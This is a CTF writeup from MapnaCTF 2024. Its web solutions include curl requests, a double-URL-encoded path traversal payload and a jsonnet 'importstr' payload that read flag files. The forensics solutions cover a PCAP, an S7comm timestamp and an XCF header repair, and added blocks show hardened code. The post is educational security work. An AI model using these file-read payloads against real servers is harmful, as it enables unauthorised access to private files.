MapnaCTF 2024 - Challenges/Writeups

Multiple members of IrisSec and myself (a new member of IrisSec!) participated in MapnaCTF 2024 and placed 2nd! This writeup only contains the challenges I personally solved or contributed to. I hope you enjoy!

You can join the Discord community for this CTF (with more writeups!) here.

Web/Flag Holding (289 solves)

Hopefully you know how web works…

Initially with the webserver given I visit the page, and this particular portion of text is displayed:

You are not coming from "http://flagland.internal/"

I move to cURL to do this challenge, and determine this is probably referring to the Referer header.

$ curl "http://18.184.219.56:8080/" -H "Referer: http://flagland.internal/"
Unspecified "secret".

Interesting, I make a new parameter secret and set it with a value of 1.

$ curl "http://18.184.219.56:8080/?secret=1" -H "Referer: http://flagland.internal/"
Incorrect secret. <!-- hint: secret is ____ which is the name of the protocol that both this server and your browser agrees on... -->

The hint is likely to be filled with http.

$ curl "http://18.184.219.56:8080/?secret=http" -H "Referer: http://flagland.internal/"
Sorry we don't have "GET" here but we might have other things like "FLAG".

I change the method from GET to FLAG.

$ curl -X FLAG "http://18.184.219.56:8080/?secret=http" -H "Referer: http://flagland.internal/"
MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f}

There we go!

Flag: MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f}

Files: None provided :(

Web/Novel reader (119 solves)

We have many fun novels for ya…

The website seems to be an article reader with one article we cannot read, and we can only read a few words with our balance.

I look into the web request for the article reading and the source code has the following segment:

name = unquote(name)
if(not name.startswith('public/')):
    return {'success': False, 'msg': 'You can only read public novels!'}, 400

unquote comes from urllib.parse and does URL decoding, so we can get around that by layering URL encoding, e.g. %2e -> %252e

We then see that the path has to start with public/ to be read.

We can achieve path traversal to read the flag using the following payload: public/%252e%252e/%252e%252e/flag.txt

Making the final web request to /api/read/public/%252e%252e/%252e%252e/flag.txt gives us the flag.

Flag: MAPNA{uhhh-1-7h1nk-1-f0r607-70-ch3ck-cr3d17>0-4b331d4b}

Files: novel-reader_d78366cb079727a6bd3809219df9bc7835d17fd1.txz
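
The prefix check described above, next to a version that resolves the path before deciding, as an added example that is not part of the original post or the challenge source. The function names, the directory layout and the assumption that the web framework has already decoded the request path once are all constructed for illustration.

```python
import os
import tempfile
from urllib.parse import unquote


def vulnerable_resolve(base, name):
    """The check from the challenge source: decode, then test only the prefix."""
    name = unquote(name)
    if not name.startswith('public/'):
        return None
    # The '..' segments are still present when the path reaches the filesystem.
    return os.path.normpath(os.path.join(base, name))


def hardened_resolve(base, name):
    """Decode, resolve symlinks and '..', then require the result under public/."""
    name = unquote(name)
    allowed = os.path.realpath(os.path.join(base, 'public'))
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([allowed, target]) != allowed:
        return None
    return target


def demo():
    # Constructed layout (assumption): <root>/flag.txt beside <root>/app/public/a.txt
    root = os.path.realpath(tempfile.mkdtemp())
    base = os.path.join(root, 'app')
    os.makedirs(os.path.join(base, 'public'))
    for path in (os.path.join(root, 'flag.txt'),
                 os.path.join(base, 'public', 'a.txt')):
        with open(path, 'w') as fh:
            fh.write('constructed sample\n')

    # Assumption: the framework decodes the request path once before the
    # handler runs, so the double-encoded dots from the page arrive as %2e%2e.
    on_the_wire = 'public/%252e%252e/%252e%252e/flag.txt'
    seen_by_handler = unquote(on_the_wire)

    return {
        'root': root,
        'handler_input': seen_by_handler,
        'vulnerable': vulnerable_resolve(base, seen_by_handler),
        'hardened': hardened_resolve(base, seen_by_handler),
        'legit': hardened_resolve(base, 'public/a.txt'),
    }


if __name__ == '__main__':
    for key, value in demo().items():
        print(f'{key:14} {value}')
```

The hardened version compares resolved paths rather than strings, so it holds no matter how many encoding layers the input went through.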

Web/Novel reader 2 (104 solves)

Submit the second flag of “Novel Reader” here

The same website also has another file we have to read inside private/A-Secret-Tale.txt

Looking at the word balance, it seems we can set negative values by purchasing -100 words, for example.

The source code for reading the file is as follows:

buf = readFile(name).split(' ')
buf = ' '.join(buf[0:session['words_balance']])+'... Charge your account to unlock more of the novel!'

If we make session['words_balance'] equal to -1 we can read the whole file!

I set my word balance to -1 and then use the path traversal vulnerability to read the file.

Flag: MAPNA{uhhh-y0u-607-m3-4641n-3f4b38571}

Files: novel-reader_d78366cb079727a6bd3809219df9bc7835d17fd1.txz
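
How the slice above behaves with a negative balance, and two server-side checks that close it, as an added example that is not part of the original post or the challenge source. The purchase handlers and the sample text are hypothetical; only the slicing line mirrors the snippet quoted above. In Python a negative stop index counts from the end, so a balance of -1 returns every word except the last one.

```python
SUFFIX = '... Charge your account to unlock more of the novel!'


def excerpt_vulnerable(text, words_balance):
    """Same slicing as the challenge source; the balance is used unchecked."""
    buf = text.split(' ')
    return ' '.join(buf[0:words_balance]) + SUFFIX


def buy_words_vulnerable(words_balance, amount):
    # Hypothetical purchase handler: a negative amount pushes the balance below zero.
    return words_balance + amount


def buy_words_hardened(words_balance, amount):
    """Reject anything that is not a positive whole number of words."""
    if isinstance(amount, bool) or not isinstance(amount, int) or amount <= 0:
        raise ValueError('amount must be a positive integer')
    return words_balance + amount


def excerpt_hardened(text, words_balance):
    """Clamp the balance so a bad stored value can never act as a negative index."""
    limit = max(0, int(words_balance))
    return ' '.join(text.split(' ')[:limit]) + SUFFIX


# Constructed sample text, not the challenge's novel.
NOVEL = 'one two three four five'

if __name__ == '__main__':
    balance = buy_words_vulnerable(10, -11)          # ends up at -1
    print(balance, '|', excerpt_vulnerable(NOVEL, balance))
    print(balance, '|', excerpt_hardened(NOVEL, balance))
```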

Web/Advanced JSON Cutifier (74 solves)

My homework was to write a JSON beautifier. Just Indenting JSON files was too boring that’s why I decided to add some features to my project using a popular (More than 1k stars on GitHub!! ) library to make my project more exciting. Important: You can’t read any file other than /flag.txt on the remote environment.

Looking at the source code provided, we can first see a redacted Go library from GitHub.

import (
    "net/http"
    "github.com/gin-gonic/gin"
    "github.com/REDACTED/REDACTED"
)

I cause some errors on the server to try and identify the library:

Expected token OPERATOR but got "}"
Expected a comma before next field

Both these errors point towards the go-jsonnet library, which meets the stars requirement in the challenge description.

I end up looking for ways to read files in the issues section of the repo and find this issue.

It mentions a payload like the following:

{
    "wow so advanced!!": importstr "/flag.txt"
}

Running it in the parser we are given the flag:

{
   "wow so advanced!!": "MAPNA{5uch-4-u53ful-f347ur3-a23f98d}\n\n"
}

Flag: MAPNA{5uch-4-u53ful-f347ur3-a23f98d}

Files: player_a466f9f2a43ac42473015d72342c262e8d4b9519.txz

Forensics/Tampered (48 solves)

Our MAPNA flags repository was compromised, with attackers introducing one invalid flag. Can you identify the counterfeit flag? Note: Forgot the flag format in the rules pages, just find the tampered one. You are not allowed to brute-force the flag in scoreboard, this will result in your team being blocked.

Looking through the given files, we are given a very long list of flags.

Basic scans show nothing out of the ordinary in flag format or length, so I look into the newlines after each flag.

I write a basic script to split all lines by the common ending \r\r\n and print any strings that don’t meet the expected length.

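# Flags are separated by \r\r\n; a chunk of any other length marks a broken separator.
with open('flags.txt', 'rb') as f:
    d = f.read().split(b'\r\r\n')
    for x in d:
        # Skip the empty chunk left after the final separator.
        if x != b'':
            # Every intact flag is 47 bytes long.
            if len(x) != 47:
                print(x)

$ python3 check.py
b'MAPNA{Tx,D51otN\\eUf7qQ7>ToSYQ\\;5P6jTIHH#6TL+uv}\r\n\rMAPNA{R6Z@//\\>caZ%%k)=ci3$IyOkSGK%w<"V7kgesY&k}'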

We can see one flag ends with \r\n\r, which is our out of place flag.

Flag: MAPNA{Tx,D51otN\\eUf7qQ7>ToSYQ\\;5P6jTIHH#6TL+uv}

Files: tampered_6fb083f974d05371cef19c0e585ba5c59da23aa8.txz

Forensics/PLC I 🤖 (355 solves)

The MAPNA CERT team has identified an intrusion into the plant’s PLCs, discovering a covert message transferred to the PLC. Can you uncover this secret message?

If we open the given PCAP in Wireshark and look through the packets, we can see small segments of data in some of them.

After looking through all the packets I see the following:

  • 3:Ld_4lW4 (Packet 19)
  • 5:3__PaAD (Packet 31)
  • 1:MAPNA{y (Packet 35)
  • 4:yS__CaR (Packet 39)
  • 6:d1n9!!} (Packet 46)
  • 2:0U_sHOu (Packet 50)

Compiled together in the numerical order we get the flag.

Flag: MAPNA{y0U_sHOuLd_4lW4yS__CaR3__PaADd1n9!!}

Files: PLC_0829b4ef9780677086043add8592e996f21e0bbe.txz

Forensics/PLC II 🤖 (11 solves)

After extensive investigations, the MAPNA forensics team discovered that the attackers attempted to manipulate the PLC time. Please identify the precise time in the following format: year:month:day:hour:minute:second:millisecond. The flag is MAPNA{sha256(datetime)}.

Looking into the data inside the packets, we see that the first two packets start with 03000016. I looked this up on GitHub and found some scripts.

This led me to S7comm, and in the examples section was example time setting traffic.

I compare the raw TCP of the example traffic to the given traffic and only 1 line isn’t similar.

The portion of the example data that was different (00191408201159330400) is a date as parsed in Wireshark's S7comm parsing.

Looking at our file we see 00202309211959299490 which can be parsed to 2023:09:21:19:59:29:949.

SHA256 sum of that gives us our flag.

Flag: MAPNA{9effd248efdf066cf432a21a34d87db56d0d0a7e4fe9bb3af6ef6f125fc36cfa}

Files: PLC_0829b4ef9780677086043add8592e996f21e0bbe.txz
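
A decoder for the 10-byte date field quoted above, as an added example that is not part of the original post. The field layout (reserved byte, two year bytes, then month through second, three BCD millisecond digits and a weekday nibble) and the Siemens two-digit-year rule are assumptions made here; the function names are hypothetical, and the page does not state exactly which bytes were hashed, so `flag_candidate` hashes the formatted string as-is.

```python
import hashlib


def bcd(byte):
    """Decode one packed-BCD byte (two decimal digits)."""
    hi, lo = byte >> 4, byte & 0x0F
    if hi > 9 or lo > 9:
        raise ValueError(f'0x{byte:02x} is not packed BCD')
    return hi * 10 + lo


def parse_s7_timestamp(hex_field):
    """Decode the date field into its components (layout assumed, see lead-in)."""
    raw = bytes.fromhex(hex_field)
    if len(raw) != 10:
        raise ValueError('expected 10 bytes (20 hex digits)')
    yy = bcd(raw[2])
    # Assumed Siemens convention: 90-99 are 19xx, 00-89 are 20xx.
    year = (1900 if yy >= 90 else 2000) + yy
    month, day, hour, minute, second = (bcd(b) for b in raw[3:8])
    # Last two bytes: three BCD millisecond digits, then a weekday nibble.
    ms_unit, weekday = raw[9] >> 4, raw[9] & 0x0F
    if ms_unit > 9:
        raise ValueError('millisecond digit is not BCD')
    if not (1 <= month <= 12 and 1 <= day <= 31 and hour < 24
            and minute < 60 and second < 60):
        raise ValueError('field out of range for a clock value')
    return {'year': year, 'month': month, 'day': day, 'hour': hour,
            'minute': minute, 'second': second,
            'millisecond': bcd(raw[8]) * 10 + ms_unit, 'weekday': weekday}


def challenge_format(ts):
    """year:month:day:hour:minute:second:millisecond, as the challenge asks."""
    return ('{year:04d}:{month:02d}:{day:02d}:{hour:02d}:'
            '{minute:02d}:{second:02d}:{millisecond:03d}').format(**ts)


def flag_candidate(text):
    return 'MAPNA{' + hashlib.sha256(text.encode()).hexdigest() + '}'


if __name__ == '__main__':
    # Both hex strings are the ones quoted in the writeup.
    for field in ('00191408201159330400', '00202309211959299490'):
        print(field, '->', challenge_format(parse_s7_timestamp(field)))
```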

Forensics/XXG (11 solves)

Welcome to the Forensics XXG challenge! Our investigator stumbled upon a mysterious file. Can you uncover the hidden message?

Initially the file appears to be a PNG, but looking through the strings we can see .goutputstream and gimp-image-metadata, among other things.

Searching leads to some results, one of particular interest: I see a reply mentioning .xcf files, and have a look at where gimp-image-metadata is to start looking at the data.

Gi?? ??? v014    È         ú            B  B                         õ   ????-image-grid       ¬(style solid)
(fgcolor (color-rgba 0 0 0 1))
(bgcolor (color-rgba 1 1 1 1))
(xspacing 10)
(yspacing 10)
(spacing-unit inches)
(xoffset 0)
(yoffset 0)
(offset-unit inches)
    gamma       0.45455000000000001    gimp-image-metadata      ç<?xml version='1.0' encoding='UTF-8'?>
<metadata>
  <tag name="Exif.Image.BitsPerSample">16 16 16</tag>
  <tag name="Exif.Image.ImageLength">12</tag>
  <tag name="Exif.Image.ImageWidth">200</tag>
  <tag name="Exif.Image.Orientation">1</tag>
  <tag name="Exif.Image.ResolutionUnit">2</tag>
  <tag name="Exif.Image.XResolution">300/1</tag>
  <tag name="Exif.Image.YResolution">300/1</tag>
  <tag name="Exif.Photo.ColorSpace">1</tag>
  <tag name="Xmp.tiff.Orientation">1</tag>
</metadata>

We can see that the start of this data has some question marks. I can see ????-image-grid, where I assume ???? is gimp.

Looking further into the .XCF format we can see the header should be gimp xcf.

The full data is then:

gimp xcf v014    È         ú            B  B                         õ   gimp-image-grid       ¬(style solid)
(fgcolor (color-rgba 0 0 0 1))
(bgcolor (color-rgba 1 1 1 1))
(xspacing 10)
(yspacing 10)
(spacing-unit inches)
(xoffset 0)
(yoffset 0)
(offset-unit inches)
    gamma       0.45455000000000001    gimp-image-metadata      ç<?xml version='1.0' encoding='UTF-8'?>
<metadata>
  <tag name="Exif.Image.BitsPerSample">16 16 16</tag>
  <tag name="Exif.Image.ImageLength">12</tag>
  <tag name="Exif.Image.ImageWidth">200</tag>
  <tag name="Exif.Image.Orientation">1</tag>
  <tag name="Exif.Image.ResolutionUnit">2</tag>
  <tag name="Exif.Image.XResolution">300/1</tag>
  <tag name="Exif.Image.YResolution">300/1</tag>
  <tag name="Exif.Photo.ColorSpace">1</tag>
  <tag name="Xmp.tiff.Orientation">1</tag>
</metadata>

Upon trying to open this in GIMP we are given an error of XCF error: unsupported XCF file version 14 encountered.

We can change the version to v001 in the file at the top.

And we now encounter that the data is corrupt, hmm…

Looking around at XCF file versions it seems people use v011. So trying v011 ends up giving a result!!

There we go!

Flag: MAPNA{F2FS_&_BFS_f1L3_5Ys73Ms_4rE_Nic3?!}

Files: MAPNA.XXG_04de6faaebbf29fb11639ef77530d3b85f09a2ce.txz
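
The header repair described above as a small script, as an added example that is not part of the original post. GIMP's XCF format documentation defines file offsets as 32-bit below version 11 and 64-bit from version 11 on, which is consistent with v001 reading as corrupt and v011 loading; the function names and the sample bytes are constructed for illustration.

```python
import re

XCF_MAGIC = b'gimp xcf '   # 9 bytes, followed by a 4-byte version tag and a NUL


def inspect_xcf_header(data):
    """Return (magic_ok, version); version is None when no tag is readable."""
    tag = data[9:13]
    match = re.fullmatch(rb'v(\d{3})', tag)
    if match:
        version = int(match.group(1))
    else:
        version = 0 if tag == b'file' else None   # 'file' marks version 0
    magic_ok = data[:9] == XCF_MAGIC and data[13:14] == b'\x00'
    return magic_ok, version


def pointer_width(version):
    """Offset size in bytes used by the rest of the file for this version."""
    return 8 if version >= 11 else 4


def repair_xcf_header(data, version=None):
    """Restore the magic and optionally relabel the version tag."""
    _, found = inspect_xcf_header(data)
    if found is None or data[13:14] != b'\x00':
        raise ValueError('no XCF version tag at offset 9')
    if version is None:
        version = found
    # Relabelling across the 32/64-bit boundary makes every offset misread.
    if pointer_width(version) != pointer_width(found):
        raise ValueError('version change would alter the offset width')
    tag = b'file' if version == 0 else b'v%03d' % version
    return XCF_MAGIC + tag + data[13:]


# Constructed sample: masked magic as in the writeup, then a few body bytes.
DAMAGED = b'Gi?? ??? v014\x00' + b'\x00\x00\x00\xc8'

if __name__ == '__main__':
    print(inspect_xcf_header(DAMAGED))
    fixed = repair_xcf_header(DAMAGED, version=11)
    print(inspect_xcf_header(fixed), fixed[:14])
```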

Thanks for reading!

Feel free to give me feedback or follow me on Twitter.

Unsolved & Challenge Archival

A list of challenges I didn’t solve, and the downloads (if provided) to try them for yourself! All challenges are sorted by solve count.

Cryptography - 3/6 solved

✅ What next? - 326 solves

In this task, we explore the realm of cryptographically secure random generators, where predicting the next output is deemed impossible. Are you ready to test your luck and skill?

Files: what_next_a4fa51cf32daf6a280431a1bced21a2ed1ca1c7d.txz

✅ What next II? - 69 solves

Again, in this task, we explore the realm of cryptographically secure random generators, where predicting the next output is deemed impossible. Are you ready to test your luck and skill this time?

Files: what_next_II_8bf8c5be355d718be974f7cbb4374072d2a039df.txz

✅ Be Fast🏃 - 34 solves

Rapid mastery of breaking symmetric encryption, deciphering codes with precision, and navigating complexities with unprecedented speed and efficiency are requirements for every professional cryptographer. So, be fast
nc 3.75.180.117 37773

Files: be_fast_dd26c22fa530432fd9ca1ee3b80d3036cff3d472.txz

GLNQ - 13 solves

Solving the DLP in matrices over a finite field is no trivial task. What are your thoughts on this GLNQ belief?
Note: flag = MAPNA{m}, Don’t convert m to bytes.

Files: glnq_9c3935a6c97ee38b4ba28e28da342b26ac13b45a.txz

Shibs - 10 solves

Dive into a cryptographic maze, untangle intricate codes, and unleash your creativity in this unique CTF experience by conquering the Shibs challenge.

Files: shibs_a69b9a6ece52d0dfdd60a1d8de96e5d2d709d9a0.txz

Isogenies - 6 solves

Explore the strange world of isogenies in cryptosystems to uncover the secret flag.

Files: isogenies_94011f7ea3b9df115a8addc45ba5965be9b895f1.txz

Forensics - 5/6 solved

✅ PLC I 🤖 - 384 solves

The MAPNA CERT team has identified an intrusion into the plant’s PLCs, discovering a covert message transferred to the PLC. Can you uncover this secret message?

Files: PLC_0829b4ef9780677086043add8592e996f21e0bbe.txz

✅ Tampered - 67 solves

Our MAPNA flags repository was compromised, with attackers introducing one invalid flag. Can you identify the counterfeit flag?
Note: Forgot the flag format in the rules pages, just find the tampered one.

Files: tampered_6fb083f974d05371cef19c0e585ba5c59da23aa8.txz

✅ PLC II 🤖 - 13 solves

After extensive investigations, the MAPNA forensics team discovered that the attackers attempted to manipulate the PLC time. Please identify the precise time in the following format:
year:month:day:hour:minute:second:millisecond
The flag is MAPNA{sha256(datetime)}.

Files: PLC_0829b4ef9780677086043add8592e996f21e0bbe.txz

✅ XXG - 11 solves

Welcome to the Forensics XXG challenge! Our investigator stumbled upon a mysterious file. Can you uncover the hidden message?

Files: MAPNA.XXG_04de6faaebbf29fb11639ef77530d3b85f09a2ce.txz

JigBoy - 5 solves

Jigboy, the superhero, possesses the remarkable ability to reel in colossal fish from the depths of the deep blue sea.

Files: flag.damaged_0ea52d00e06812858295d9e8cea9c765517e8b6d.txz

✅ Mitrek - 2 solves

In the MAPNA field, a malicious traffic, was intercepted, with an unidentified protocol. Investigators suspect file transmission. Seek secret message.
Note: The file is updated, please download again.

Files: Mitrek_5a6bdca24a8bcd1fd507214e14e9dd2ae4ec0006.txz

Pwnable - 0/4 solved

ninipwn - 57 solves

pwn ^ pwn ^ pwn ^ pwn ^ pwn ^ pwn
nc 3.75.185.198 7000

Files: ninipwn_be672cb6b51e073adabe9eea358c2d8a394ed2a7.txz

Buggy Paint - 16 solves

I wrote a paint for myself but It seems kinda buggy
nc 3.75.185.198 2000

Files: buggypaint_333dedd782ee96a33bec96cb561e68f20c3e7172.txz

Protector - 12 solves

my flag is protected! what are you gonna do
nc 3.75.185.198 10000

Files: protector_b8e161eab7a18b9d3942080b4c68ed2d13f251cc.txz

U2S - 2 solves

I just changed S2U to U2S… This shouldn’t lead to scary things right?
nc 3.75.185.198 6666

Files: u2s_4a18b813cd815ff3fdd52f5d306decb8462674ff.txz

Reverse - 6/6 solved

✅ Compile Me! 🔨 - 142 solves

Compile the given code and execute the resulting binary, passing the source code file as an argument, to obtain the flag.
Welcome,to,MAPNA,CTF,Year_2k24;main(){for(++CTF;to=-~getchar();Welcome+=11==to,Year_2k24++)CTF=to>0xe^012>to&&'`'^to^65?!to:!CTF?++MAPNA:CTF;printf("MAPNA{%4d__%d__%d_!}\n",(to+20)^(Welcome+24)+1390,MAPNA+=(!CTF&&Year_2k24)+10,Year_2k24+31337);}

Files: None provided :(

✅ Heaverse - 42 solves

Heaverse, a paradoxical binary that defies logic: reverse it without reversing it. Can you navigate its enigmatic depths?
Flag format: MAPNA{CAPITAL_WORDS_THAT_YOU_FIND}

Files: heaverse_845b76c13d88953ff0f6a98442c73c025361a3f4.txz

✅ Prism💎 - 23 solves

Prism has implemented a sophisticated anti-reverse engineering technique in the binary. Can you bypass this mechanism to obtain the flag?

Files: Prism_6c93a8c550a949c2aacec5af102cf8a1949b8c97.txz

✅ Tetim - 7 solves

Begin on a formidable journey into the realm of Zig reverse with tetim, a challenging and intricate reverse engineering task. Unusual for CTFs, it features Zig language binaries and promises a riveting experience, designed for those seeking revenge at MAPNA CTF.

Files: tetim_e123d1a419f4bdef19f1981a111fd850a59c03d4.txz

✅ Locate Me! - 5 solves

Guys, in this reverse engineering challenge, your task is to skillfully locate me within the intricate digital labyrinth.
nc 95.216.191.248 13770

Files: locateme_3ad6837da934a2a05dc2162c029efe1a02069703.txz

✅ Time Traveler 🕰️ - 2 solves

Enjoy the vintage with a time traveler! 🎈🎶📻
Note: Do not forget to add MAPNA at the beginning of flag!

Files: time_traveler_1e34fc22a96751169aff190bf3bb57490fa8a30a.txz

Web - 5/6 solved

✅ Flag Holding - 318 solves

Hopefully you know how web works…
http://18.184.219.56:8080/

Files: None provided :(

✅ Novel reader - 144 solves

We have many fun novels for ya…
http://3.64.250.135:9000

Files: novel-reader_d78366cb079727a6bd3809219df9bc7835d17fd1.txz

✅ Novel Reader 2 - 125 solves

Submit the second flag of “Novel Reader” here

Files: novel-reader_d78366cb079727a6bd3809219df9bc7835d17fd1.txz

✅ Advanced JSON Cutifier - 88 solves

My homework was to write a JSON beautifier. Just Indenting JSON files was too boring that’s why I decided to add some features to my project using a popular (More than 1k stars on GitHub!! ) library to make my project more exciting.
Important: You can’t read any file other than /flag.txt on the remote environment.
http://3.64.250.135:8005

Files: player_a466f9f2a43ac42473015d72342c262e8d4b9519.txz

✅ Purify - 4 solves

I think I downloaded the wrong DOMPurify.
Website: http://91.107.157.58:7000/
Admin bot: http://91.107.157.58:7001/

Files: purify_206ec7c8d65c88cb617775a62bc5ab9bcfaa7baa.txz

Gimme Content Type - 0 solves

I got your csp from asisctf 2023 finals, now gimme your content type!
Hint: app.alert
google-chrome '--unsafely-treat-insecure-origin-as-secure=http://91.107.157.58:8000'
website: http://91.107.157.58:8000
admin bot: http://91.107.157.58:8001

Files: gimme-content-type_ab8a9463c53d97e566e92643dcc2e1f971c7dead.txz

This post is licensed under CC BY 4.0 by the author.